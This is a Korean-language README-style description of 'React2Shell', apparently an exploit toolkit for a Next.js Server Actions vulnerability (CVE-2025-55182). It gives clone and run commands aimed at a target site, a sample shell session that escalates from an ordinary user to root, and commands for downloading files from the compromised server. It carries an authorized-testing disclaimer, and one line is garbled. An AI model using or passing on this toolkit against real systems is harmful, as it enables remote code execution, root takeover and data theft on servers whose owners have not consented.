
Next.js Server Actions용 고급 익스플로잇 툴킷 (CVE-2025-55182)
Next.js Server Actions(CVE-2025-55182)를 위한 고급 익스플로잇 툴킷.
React2Shell은 React2Shell 취약점을 악용하도록 설계된 강력한 인터랙티브 셸 래퍼입니다. 단순한 RCE를 넘어 명령 기록, 파일 전송 기능, 자동화된 권한 상승 전략을 제공합니다.
base64 | sudo -i)..download <remote> [local]: base64 인코딩을 사용한 안정적인 바이너리 안전 파일 다운로드..save: 명령 출력을 로컬 증거 파일로 저장.
git clone https://github.com/xalgord/React2Shell.git
cd React2Shell
pip install requests
python3 react2shell.py -u https://target-nextjs-site.com/
검증된 루트 지속성 전략 탐지와 함께 실행:
python3 react2shell.py -u https://target.com/
셸에 진입한 후:
ubuntu@target:~$ id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu)...
ubuntu@target:~$ .root
[*] Root mode ENABLED
root@target:~$ id
uid=0(root) gid=0(root) groups=0(root)
교육 목적으로만 사용하십시오. 이 도구는 보안 연구 및 승인된 테스트만을 위해 제작되었습니다. 저자는 이 도구로 인해 발생하는 오용이나 손해에 대해 책임을 지지 않습니다. 명시적 테스트 허가를 받지 않은 대상을 스캔하거나 악용하지 마십시오.
윤리적 침투 테스트 및 레드 팀 운영을 위해 개발되었습니다.
| 명령 | 설명 |
|---|
.root | 루트 모드 전환(명령을 sudo -i로 래핑) |
.download <file> | 원격 서버에서 파일 다운로드 |
.save | 마지막 명령의 출력을 파일로 저장 |
.exit | 셸 종료 |